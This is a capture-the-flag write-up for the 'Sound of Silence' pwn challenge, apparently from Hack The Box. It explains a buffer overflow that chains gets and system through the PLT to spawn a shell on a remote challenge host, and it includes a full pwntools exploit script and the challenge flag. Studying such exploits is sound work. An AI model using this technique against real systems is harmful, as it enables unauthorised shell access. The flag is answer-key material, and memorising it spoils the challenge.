# Pwn - Sound of Silence

## Description

Navigate the shadows in a dimly lit room, silently evading detection as you strategize to outsmart your foes. Employ clever distractions to divert their attention, paving the way for your daring escape!

## Downloads

{% file src="<https://4077916634-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F9J6tnLQGbY0Or10P4xUT%2Fuploads%2FwG10w5GMoXNT1omH0x7I%2Fpwn_sound_of_silence.zip?alt=media&token=198025ce-1956-44e3-994e-f2b9e0657e72>" %}

## Solution

<figure><img src="https://4077916634-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F9J6tnLQGbY0Or10P4xUT%2Fuploads%2FZdgDWikb4liYu4jKyfng%2Fimage.png?alt=media&#x26;token=cce7f20c-ac23-4646-8d1f-c7b32139b089" alt=""><figcaption><p>Checksec</p></figcaption></figure>

Firstly, Full RELRO so no GOT overrides and NX enabled which means we can't execute shellcode on the stack.

<figure><img src="https://4077916634-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F9J6tnLQGbY0Or10P4xUT%2Fuploads%2FcD2gKRrnz4VdSgUeJYUj%2Fimage.png?alt=media&#x26;token=5f9363f2-e4fe-4f23-9d72-a322063793dd" alt=""><figcaption><p>main()</p></figcaption></figure>

The program is relatively simple with `system()` and `gets()` but no 'win' function. To pwn this we likely need to get the program to execute `system('/bin/sh')`. There wasn't any gadget that could modify `rdi` which made the challenge a little tough. (After the event, someone noted that there is the `mov rdi, rax` gadget in the main function but interestingly, ROPgadget did not pick it up so we could use that if we wanted to.)

<figure><img src="https://4077916634-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F9J6tnLQGbY0Or10P4xUT%2Fuploads%2F668JkR0N3MvAjR4lLBZZ%2Fimage.png?alt=media&#x26;token=457ac175-cc20-4512-b941-3cd96e27108c" alt=""><figcaption><p>The only gadget which is not so useful.</p></figcaption></figure>

But we don't actually need a ROP gadget. `gets()` actually stores the user input into `rdi` which makes this very easy.

Another interesting thing to note is that if we just pass in "/bin/sh" to `gets()`, the 5th character gets shifted 1 letter downwards.

<figure><img src="https://4077916634-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F9J6tnLQGbY0Or10P4xUT%2Fuploads%2Fz0fDaK7yFyWi6DjCIOHx%2Fimage.png?alt=media&#x26;token=7b6586aa-5758-4601-932a-f831b647e0bb" alt=""><figcaption><p>'/bin/sh' became '/bin.sh'</p></figcaption></figure>

To overcome this we just need to send "/bin0sh" instead.

```python
from pwn import *

exe = './sound_of_silence'
elf = context.binary = ELF(exe, checksec=False)
# context.log_level = 'debug'

offset = 40

# io = process(exe)
io = remote("94.237.63.93", 59792)

payload = b'A' * offset
payload += p64(elf.plt.gets)
payload += p64(elf.plt.system)

io.sendlineafter(b'>> ', payload)
io.sendline(b'/bin0sh')

io.interactive()
```

<figure><img src="https://4077916634-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F9J6tnLQGbY0Or10P4xUT%2Fuploads%2Fxd4FLMmMg16GU8cJBhEF%2Fimage.png?alt=media&#x26;token=d8c23c95-ca6e-402a-ade6-4440db5cb518" alt=""><figcaption><p>Pwned</p></figcaption></figure>

Flag: `HTB{n0_n33d_4_l34k5_wh3n_u_h4v3_5y5t3m}`